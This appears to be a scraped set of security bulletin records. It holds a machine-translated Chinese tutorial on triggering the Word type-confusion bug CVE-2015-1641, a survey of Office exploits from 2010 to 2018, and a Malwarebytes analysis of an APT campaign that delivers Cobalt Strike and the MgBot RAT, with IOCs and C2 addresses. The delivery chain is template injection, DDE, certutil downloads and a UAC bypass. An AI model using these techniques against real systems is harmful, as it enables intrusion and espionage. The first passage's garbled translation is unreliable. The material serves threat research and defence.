the twins tag, is He the founder of Microsoft assigned to different jobs, that sometimes Microsoft's own didn't even recognize who is who. In fact, the type confusion vulnerability it is thus, seen above in the debugger the crash position, that is, the word program parses to moveFromRange*label, prepare the internal id of the transfer to which the parent element smartTag\uff08/customXml object\u201cspace\u201dinside it. By back tracking this process and contrast, if it is a normal case of the higher tag for the customXml, the transfer will be carried out once the memory allocation and then copy it to new memory space; and if it is a confusing case, since both objects the essence of the difference, this time directly to the id value of the transfer to the smartTag object has some internal space, the following two cases of code of the tracking sequence contrast figure: \n! [](/Article/UploadPic/2016-12/2016123171530657. png? www. myhack58. com! web) \nSince the two tags inside the attributes of the members have a certain similarity can lead to type confusion, the syntax through an internal check, but the actual parsing process, the object's internal lack of strict check, cause confusion to the smartTag object, parse moveFromRange*when the tag is considered to replace the need of memory space already exists, on the direct use of the wrong location for the copy process, resulting in this can be utilized the security vulnerability. \nConfigured to trigger the vulnerability POC \nAccording to the above principle, the vulnerability occurs in the scene is the word program in the analysis inside custom xml customXml tags there is a replacement marker case, the original moveFromRange*tag is to the tag id is transmitted to the superior customXml object, however, due to the customXml and its brother label smartTag there is a certain similarity, resulting in the customXml tag is replaced with the smartTag occurs when the type of Confusion caused by memory copy vulnerabilities. The following describes how to construct the trigger this vulnerability POC samples, we first make one thing clear, in order to achieve arbitrary memory address, we need to control the two variables are confused after the smartTag tag of element attribute values and moveFromRange*tag id value, they were controlled to overwrite the memory address and memory data, the reverse track at the above-mentioned point of collapse function: \n\n\n**[1] [[2]](<81759_2.htm>) [[3]](<81759_3.htm>) [next](<81759_2.htm>)**\n", "cvss3": {}, "published": "2016-12-03T00:00:00", "type": "myhack58", "title": "Hand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09-bug warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2015-1641"], "modified": "2016-12-03T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/81759.htm", "id": "MYHACK58:62201681759", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 2, "cvss3": {}, "published": "2019-06-13T00:00:00", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2020-08-07T08:03:43", "description": "_This blog post was authored by Hossein Jazi and J\u00e9r\u00f4me Segura_\n\nOn July 2, we found an archive file with an embedded document pretending to be from the government of India. This file used template injection to drop a malicious template which loaded a variant of Cobalt Strike. \n\nOne day later, the same threat actor changed their template and dropped a loader called MgBot, executing and injecting its final payload through the use of Application Management (AppMgmt) Service on Windows.\n\nOn July 5, we observed yet another archive file with an embedded document borrowing a statement about Hong Kong from UK's prime minister Boris Johnson. This document used the same TTPs to drop and execute the same payload.\n\nConsidering the ongoing tensions between India and China, as well as the new security laws over Hong Kong, we believe this new campaign is operated by a Chinese state-sponsored actor. Based on our analysis, we believe this may be a Chinese APT group that has been active since at least 2014.\n\n### Active targeting with different lures\n\nWe were able to track the activities related to these threat actors over the succession of several days based on unique phishing attempts designed to compromise their target.\n\n#### 'Mail security check' with Cobalt Strike (variant 1)\n\nThis campaign was most likely carried out through spear phishing emails. The .rar file (_Mail security check.rar_) includes a document with the same name (Figure 1). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/mailsecuritycheck-1.png> \"\" )Figure 1: Mail security check.docx\n\nThe document uses template injection to download a remote template from the following URL (Figure 2). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplate-1.png> \"\" )Figure 2: Template injection\n\nThe downloaded template uses the dynamic data exchange (DDE) protocol to execute malicious commands, which are encoded within the document's content (Figure 3).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-1.png> \"\" )Figure 3: Encoded command\n\nAfter decoding, we can see the list of commands that will be executed by DDE:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-1.png> \"\" )Figure 4: Decoded commands\n\nAs Figure 4 shows, the threat actors used _certutil _with_ -urlcache -split -f_ parameters to download a _com scriptlet_ from its server and then used the _[Squiblydoo](<https://car.mitre.org/analytics/CAR-2019-04-003/>)_ technique to execute the downloaded scriptlet via _regsvr32.exe _on the victim machine.\n\nThis scriptlet is stored in the _Documents_ directory as "ff.sct". The scriptlet is an XML file that has embedded VBscript (Figure 5). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/sct-file-1.png> \"\" )Figure 5: ff.sct snipplet\n\nThe scriptlet creates a VB macro and calls Excel to execute it. The macro has been obfuscated to bypass static security mechanism and is responsible for injecting the embedded payload into _rundll32.exe_ using the reflective DLL injection method. The injected payload is a variant of Cobalt Strike. \n\nThe following diagram shows the overall process of this attack:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.29.43-PM.png> \"\" )Figure 6: Overall process\n\n#### 'Mail security check' with MgBot (variant 2)\n\nAs we mentioned earlier, a day after the first attack, the APT group changed its remote template. In this new variant, the actors stopped using the Squiblydoo technique and Cobalt Strike as a payload. \n\nFigure 7 shows the new encoded commands embedded within the template file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-2-1.png> \"\" )Figure 7: Encoded command\n\nFigure 8 shows the list of commands that will be executed by DDE. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-2-1.png> \"\" )Figure 8: Decoded commands\n\nIn this new template file, the _storm.sct_ scriptlet was replaced with _storm.txt_. Similar to the previous version, _certutil_ is used to download the storm.txt file which is an executable stored in the Documents directory as ff.exe.\n\nThe following diagram shows the overall execution process:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.30.07-PM.png> \"\" )Figure 9: Overall execution process\n\n#### "Boris Johnson Pledges to Admit 3 Million From Hong Kong" with MgBot (variant 3)\n\nThe last document used by the Chinese APT group in this campaign focused on issues happening in Hong Kong. The file was embedded within an archive file named "Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.rar".\n\nThis document quotes the prime minister after a new security law was issued by China against Hong Kong (Figure 10). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/boris-1.png> \"\" )Figure 10: Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.\n\nSimilar to the other documents, it also uses template injection to download the remote template (Figure 11).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplteBoris-1.png> \"\" )Figure 11: Remote template \n\nThe downloaded template (BNOHK.docx) is similar to ADIN.docx (variant 2) in which it uses DDE to download and drop its loader. \n\n### Payload analysis: MgBot (BLame, Mgmbot)\n\nThe dropped executable (ff.exe) is a new variant of a loader called MgBot that drops and loads the final payload. This loader pretends to be a _Realtek Audio Manager tool_ (Figure 12).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.25-PM-300x115-1.png> \"\" )Figure 12: File version information\n\nIt has four embedded resources in which two of them are in Chinese Simplified language. This is an indicator that suggests this campaign is likely operated by a Chinese APT group. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.58-PM-2.png> \"\" )Figure 13: Resource language\n\nThe loader starts its process by escalating privilege through a UAC bypass using the [CMSTPLUA COM interface](<https://cqureacademy.com/cqure-labs/cqlabs-how-uac-bypass-methods-really-work-by-adrian-denkiewicz>).\n\nMgBot uses several anti-analysis and anti-virtualization techniques. The code is self modifying which means it alters its code sections during runtime. This makes static analysis of the sample harder.\n\nMgBot tries to avoid running in known virtualized environment such as _VmWare_,_ Sandboxie_ and _VirtualBox_. To identify if it's running in one of these environments, it looks for the following DLL files: _vmhgfs.dll_, _sbiedll.dll_ and _vboxogl.dll_ and if it finds any of these DLLs, it goes to an infinite loop without doing any malicious activity (Figure 14).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/virutalizationChecks-1.png> \"\" )Figure 14: Anti-VMs\n\nIt also checks for the presence of security products on the victim's machine and takes a different execution flow if a security product is detected. For example, it checks for _zhudongfangyu.exe, 360sd.exe, 360Tray.exe, MfeAVSvc.exe and McUICnt.exe _in different parts of the code (Figure 15). The malware does not perform all the checks at once and it rather checks a couple of them at different steps of its execution. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/av-1.png> \"\" )Figure 15: Security products checks\n\nTo invoke the required APIs, the malware does not call them directly but instead builds a function pointer table for the required APIs. Each request to an API call is made through the access to the relevant index of this table. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/apis-1.png> \"\" )Figure 16: Building function pointer table\n\nAs an example, when the malware needs to invoke _WinExec_, it does so by invoking it through its index from the function pointer table.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/winexec-1.png> \"\" )Figure 17: Calling API through use of function pointer table\n\nAfter building the required API calls table, the malware performs the following procedures: \n\n * It calls _CreateFileW_ to create _iot7D6E.tmp_ (random name starting with iot) into the _%APPDATA%Temp_ directory. This tmp file is a cab file that embedds the final payload.\n * It calls _WriteFile_ to populate its content\n * It calls _CreateProcessInternalW_ to invoke _expand.exe_ to decompress the content of _iot7D6E.tmp_ into _ProgramData\\Microsoft\\PlayReady\\MSIBACF.tmp\\tmp.dat_ (the _MSIBACF.tmp_ directory name is generated randomly and starts with MSI and then is followed by a combination of random numbers and characters)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/expand-1.png> \"\" )Figure 18: Calling expand.exe\n\n * It calls _CopyFileW_ to copy tmp.dat into _pMsrvd.dll_\n * It calls _DeleteFileW_ to delete _tmp.dat_\n * It drops _DBEngin.EXE_ and _WUAUCTL.EXE_ in the _ProgramData\\Microsoft\\PlayReady_ directory. Both of these files are _rundll32.exe_ that is used later to execute the dropped DLL.\n * It modifies the registry hive of of _HKLM\\SYSTEM\\CurrentControlSet\\Services\\AppMgmt_ registry location to make itself persistent. To perform this modification, it drops two registry files named iix*.tmp (random numbers have been added to iix) into the %APPDATA%Temp directory which are the old and new registry hives for the mentioned registry location.\n\nTo load the dropped DLL (_pMsrvd.dll_) the loader registers it as a service. To achieve this, it makes use of the already installed service, AppMgmt, to load the payload as shown in the following images:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/reg2new-1.png> \"\" )Figure 18: ServiceDll\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/regnew1-1.png> \"\" )Figure 19: ImagePath\n\nFinally, it executes the dropped DLL by running_ net start AppMgmt_. After loading the DLL, the Loader creates a cmd file (_lgt*.tmp_.cmd) in the _%APPDATA%TEMP _directory with the content shown in Figure 20. Then it executes it to delete the cmd file and loader from the victim's machine. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/cmdnew-1.png> \"\" )Figure 20: cmd file\n\nWe were able to identify several different variants of this loader. In general, all the variants drop the final payload using _expand.exe_ or _extrac32.exe _and then use "net start _AppMgmt_" or "net start StiSvc" to execute the dropped DLL with one of the following configurations:\n\n * svchost.exe -k netsvcs -p -s AppMgmt\n * svchost.exe -k netsvcs\n * svchost.exe -k imgsvc\n\nThe dropped DLL is the main payload used by this threat actor to perform malicious activities. The following shows the file version information pretending to be a _Video Team Desktop App. _\n\nFigure 21: File info\n\nThe creation time for this DLL appears to be "2008-04-26 16:41:12". However, based on Rich header data, we can assert that this might have been tampered with by the threat actor. \n\nFigure 22: Rich header\n\nThe DLL has eight export functions with carefully selected names to pretend they are doing normal tasks. It can check the running services and based on that can inject itself into the memory space of WmiPrvSE.exe. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmicode-1.png> \"\" )Figure 23: Injection into WmiPrvse.exe\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmi-1.png> \"\" )Figure 24: RAT's DLL is injected into memory space of WmiPrvse.exe\n\nIt uses several anti-debugging and anti-virtualization techniques to detect if it's running in a virtualized environment or if it is being debugged by a debugger. It uses _GetTickCount_ and _QueryPerformanceCounter_ API calls to detect the debugger environment.\n\nTo detect if it is running in a virtual environment, it uses anti-vm detection instructions such as _sldt_ and _cpid_ that can provide information about the processor and also checks Vmware IO ports (VMXH).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/type-510x600-1.png> \"\" )Figure 25: Environment Detection\n\nAll the strings used by this RAT are either obfuscated or XOR encoded to make its analysis hard. \n\nThis final piece of code bundled in MgBot is a Remote Administration Trojan with several capabilities such as: \n\n * C2 communication over TCP (42.99.116[.]225:12800)\n * Ability to take screenshots\n * Keylogging\n * File and directory management\n * Process management\n * Create MUTEX\n\n### Infrastructure relations\n\nThe following shows the infrastructure used by this APT and relations between hosts used by this group. This APT group has used several different IP addresses to host its malicious payloads and also for its C2 communications.\n\nWhat is interesting is that the majority of IP addresses used by this APT are located in Hong Kong and almost all of these Hong Kong-based IP addresses are used for C2 communication. Even in their past campaigns they mostly have used infrastructure in Hong Kong. The graph also shows the relationship between different IP addresses used by this APT group.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/VT-1-1.png> \"\" )Figure 26: Infrastructure connections\n\n### Android RAT\n\nWe also found several malicious Android applications we believe are part of the toolset used by this APT group. Malwarebytes detects them as _Android/Trojan.Spy.AndroRat.KSRemote_.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/android-1.png> \"\" )Figure 27: Malicious Android APK\n\nAll these bogus applications contain a jar file named _[ksremote.jar](<https://www.virustotal.com/gui/file/5f76192e952fd0002c1df4b66423ae803536ad82a1ae36bc9bfc6f73a7093b7f/detection>)_ that provides the RAT functionality:\n\n * Recording screen and audio using the phone'ss camera/mic\n * Locating phone with coordinates\n * Stealing phone contacts, call log, SMS, web history\n * Sending SMS messages\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/contacts-1.png> \"\" )Figure 28: Contact grabbing capability\n\nThis RAT communicates with C&C servers using random port numbers within the 122.10.89.170 to 179 range (all in Hong Kong)\n\n * 122.10.89[.]172:10560\n * 122.10.89[.]170:9552\n * 122.10.89[.]172:10560\n\n### TTPs in line with Chinese APTs\n\nThe lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China.\n\nThe TTPs observed in these attacks have been used by several Chinese APT groups:\n\n * [Rancor](<https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/>) APT is known to use Certutil to download their payload\n * [KeyBoy](<https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html>) is known to have used DDE is its previous campaigns\n * APT40 has utilized [Squiblydoo](<https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets>) and [template injection](<https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign>) in its previous campaigns. \n\nConsidering these factors we attribute this APT attack with moderate confidence to a new Chinese APT group. Based on the TTPs used by this APT group we were able to track back its activities to at least 2014. In all their campaigns the actor has used a variant of MgBot.\n\n### A threat actor with a long documented history\n\nA [Needle in a haystack](<https://www.virusbulletin.com/virusbulletin/2014/02/needle-haystack>) blog post from 2014 detailed a campaign that drops a Trojan disguised as a legitimate MP3 encoder library. In this campaign the actor used [CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) to drop its Trojan. The rest of the TTPs including the methods used by the threat actor to execute MgBot and registry modifications are similar to this ongoing campaign. \n\nIn 2018, this group performed another operation in which they used a VBScript vulnerability ([CVE-2018-8174)](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>) to [initiate their attack ](<http://771a8f83a0c6f08b2060d86fcbd40d36ee3a681beadb32ff6f288e2648c64bf9>)to drop a variants of MgBot. In March 2020, an archive file ([warning.rar](<http://bc85b5b1e69728b01e64266506904eacd6bbc1bf60a5e631cb35327e494f9815>)) was submitted to VirusTotal that we believe is part of another campaign used by this actor.\n\nWe will continue this group's activities to see if their targeting or techniques evolve. Malwarebytes users are protected from this campaign thanks to our signature-less anti-exploit layer.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/nebula_.png> \"\" )Figure 29: Malwarebytes Nebula blocking malicious Word document\n\n### MITRE ATT&CK techniques\n\n**Tactic**| **ID**| **Name**| **Details** \n---|---|---|--- \nExecution| [T1059](<https://attack.mitre.org/techniques/T1059>)| Command-Line Interface| Starts CMD.EXE for commands execution \n\ufeff| [T1106](<https://attack.mitre.org/techniques/T1106>)| Execution through Module Load| Loads dropped or rewritten executable \n- WUAUCTL.EXE \n- svchost.exe \n- rundll32.exe \n\ufeff| [T1053](<https://attack.mitre.org/techniques/T1053>)| Rundll32| Uses RUNDLL32.EXE to load library \n\ufeff| [T1064](<https://attack.mitre.org/techniques/T1064>)| Scripting| WScript.exe: Starts MSHTA.EXE for opening HTA or HTMLS files \n\ufeff| [](<https://attack.mitre.org/techniques/T1204>)[T1035](<https://attack.mitre.org/techniques/T1035>)| service execution| Starts NET.EXE for service management \n| [T1170 ](<https://attack.mitre.org/techniques/T1170>)| mshta| Starts MSHTA.EXE for opening HTA or HTMLS files \n| [T1086](<https://attack.mitre.org/techniques/T1086>)| PowerShell| Executes PowerShell scripts \nPrivilege Escalation| [T1050](<https://attack.mitre.org/techniques/T1050>)| new service| Creates or modifies windows services through rundll32.exe \n\ufeff| [T1088](<https://attack.mitre.org/techniques/T1088>)| Bypass UAC| Known privilege escalation attack through DllHost.exe \nPersistence| [T1031](<https://attack.mitre.org/techniques/T1031>)| Modify Existing Service| Creates or modifies windows services through rundll32.exe \n| [T1050](<https://attack.mitre.org/techniques/T1050>)| new services| Creates or modifies windows services through rundll32.exe \nDefense Evasion| [](<https://attack.mitre.org/techniques/T1107>)[T1107](<https://attack.mitre.org/techniques/T1107>)| File Deletion| Starts CMD.EXE for self-deleting \n\ufeff| [T1085 ](<https://attack.mitre.org/techniques/T1085>)| Rundll32| Uses RUNDLL32.EXE to load library \n| [T1088](<https://attack.mitre.org/techniques/T1088>)| bypass UAC| Known privilege escalation attack through DllHost.exe \n| [T1497](<https://attack.mitre.org/techniques/T1497/>)| Virtualization/Sandbox Evasion| The Loader uses several anti-virtualization detections techniques \n| [T1221](<https://attack.mitre.org/techniques/T1221/>)| Template Injection| Maldoc uses template injection to download remote template \n| [T1218](<https://attack.mitre.org/techniques/T1218/>)| Signed Binary Proxy Execution| Use Squiblydoo to load executable \nDiscovery| [T1012](<https://attack.mitre.org/techniques/T1012>)| Query Registry| Reads the machine GUID from the registry \n| [T1082](<https://attack.mitre.org/techniques/T1082>)| System Information Discovery| Reads the machine GUID from the registry \n| [T1007](<https://attack.mitre.org/techniques/T1007>)| System Service Discovery| Starts NET.EXE for service management \nLateral Movement| [T1105](<https://attack.mitre.org/techniques/T1105>)| Remote File Copy| - certutil.exe: Downloads executable files from the Internet \n- cmd.exe: Starts CertUtil for downloading files \nC&C | [T1105](<https://attack.mitre.org/techniques/T1105>)| Remote File Copy| - certutil.exe: Downloads executable files from the Internet \n - cmd.exe: Starts CertUtil for downloading files \nTable 1: Mitre Attack TTPs\n\n### IOCs\n\n**2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a** Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.docx\n\n**fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc** BNOHK.docx.zip\n\n**3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790** Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar\n\n**ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03** Email security check.rar\n\n**1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6** Email security check.docx\n\n**3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b** ADIN.docx (storm.sct)\n\n**855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8** ADIN.docx (storm.sct)\n\n**1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585** ff.exe (storm.txt)\n\n**99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a** cobalt strike\n\n**flash.governmentmm.com**: This domain used by actor to host remote templates. It has been registered 3 month ago by someone in United States.\n\n**MgBot samples**\n\n2310f3d779acdb4881b5014f4e57dd65b4d6638fd011ac73e90df729b58ae1e0 \ne224d730e66931069d6760f2cac97ab0f62d1ed4ddec8b58783237d3dcd59468 \n5b0c93a70032d80c1f5f61e586edde6360ad07b697021a83ed75481385f9f51f \n1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585 \n07bb016c3fde6b777be4b43f293cacde2d3aae0d4e4caa15e7c66835e506964f \n7bdfabdf9a96b3d941f90ec124836084827f6ef06fadf0dce1ae35c2361f1ac6 \n8ab344a1901d8129d99681ce33a76f7c64fd95c314ac7459c4b1527c3d968bb4 \nf41bfc57c2681d94bf102f39d4af022beddafb4d49a49d7d7c1901d14eb698d2\n\n**45.77.245[.]0: **This IP has been used 